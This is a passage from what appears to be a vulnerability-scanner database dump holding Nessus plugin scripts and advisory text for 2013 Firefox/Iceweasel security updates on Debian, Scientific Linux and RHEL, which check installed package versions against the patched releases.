script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_xref(name:\"DSA\", value:\"2716\");\n\n script_name(english:\"Debian DSA-2716-1 : iceweasel - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in Iceweasel, Debian's\nversion of the Mozilla Firefox web browser: Multiple memory safety\nerrors, use-after-free vulnerabilities, missing permission checks,\nincorrect memory handling and other implementation errors may lead to\nthe execution of arbitrary code, privilege escalation, information\ndisclosure or cross-site request forgery.\n\nThe Iceweasel version in the oldstable distribution (squeeze) is no\nlonger supported with security updates.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/iceweasel\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2716\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the iceweasel packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 17.0.7esr-1~deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceweasel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-dbg\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-dev\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ach\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-af\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-all\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-an\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ar\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-as\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ast\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-be\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bg\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bn-bd\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bn-in\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-br\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bs\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ca\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-cs\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-csb\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-cy\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-da\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-de\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-el\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-en-gb\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-en-za\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-eo\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-ar\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-cl\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-es\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-mx\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-et\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-eu\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fa\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ff\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fi\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fr\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fy-nl\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ga-ie\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gd\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gl\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gu-in\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-he\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hi-in\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hr\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hsb\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hu\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-hy-am\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-id\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-is\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-it\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ja\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-kk\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-km\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-kn\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ko\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ku\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lij\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lt\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-lv\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mai\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mk\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ml\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-mr\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ms\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nb-no\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nl\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-nn-no\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-or\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pa-in\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pl\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pt-br\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-pt-pt\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-rm\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ro\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ru\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-si\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sk\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sl\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-son\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sq\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sr\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-sv-se\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ta\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-te\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-th\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-tr\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-uk\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-vi\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-xh\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zh-cn\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zh-tw\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-zu\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:47:37", "description": "Several flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\n0.7 ESR, which corrects these issues. After installing the update,\nFirefox must be restarted for the changes to take effect.", "edition": 14, "published": "2013-06-26T00:00:00", "title": "Scientific Linux Security Update : firefox on SL5.x, SL6.x i386/x86_64 (20130625)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-06-26T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:xulrunner-debuginfo", "p-cpe:/a:fermilab:scientific_linux:firefox", "p-cpe:/a:fermilab:scientific_linux:xulrunner-devel", "p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:xulrunner"], "id": "SL_20130625_FIREFOX_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/66983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66983);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL5.x, SL6.x i386/x86_64 (20130625)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\n0.7 ESR, which corrects these issues. After installing the update,\nFirefox must be restarted for the changes to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1306&L=scientific-linux-errata&T=0&P=2075\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?65443fd6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xulrunner-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"firefox-17.0.7-1.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"firefox-debuginfo-17.0.7-1.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"xulrunner-17.0.7-1.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"xulrunner-debuginfo-17.0.7-1.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"xulrunner-devel-17.0.7-1.el5_9\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"firefox-17.0.7-1.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"firefox-debuginfo-17.0.7-1.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xulrunner-17.0.7-1.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xulrunner-debuginfo-17.0.7-1.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xulrunner-devel-17.0.7-1.el6_4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo / xulrunner / xulrunner-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:12:38", "description": "Updated firefox packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew\nMcCreight, Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos,\nPaul Stone, Boris Zbarsky, and moz_bug_r_a4 as the original reporters\nof these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 17.0.7 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 17.0.7 ESR, which corrects these issues. After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.", "edition": 22, "published": "2013-06-26T00:00:00", "title": "RHEL 5 / 6 : firefox (RHSA-2013:0981)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-06-26T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:xulrunner-debuginfo", "cpe:/o:redhat:enterprise_linux:5.9", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:xulrunner", "p-cpe:/a:redhat:enterprise_linux:firefox", "p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo", "p-cpe:/a:redhat:enterprise_linux:xulrunner-devel", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2013-0981.NASL", "href": "https://www.tenable.com/plugins/nessus/66979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0981. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66979);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_xref(name:\"RHSA\", value:\"2013:0981\");\n\n script_name(english:\"RHEL 5 / 6 : firefox (RHSA-2013:0981)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated firefox packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew\nMcCreight, Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos,\nPaul Stone, Boris Zbarsky, and moz_bug_r_a4 as the original reporters\nof these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 17.0.7 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade 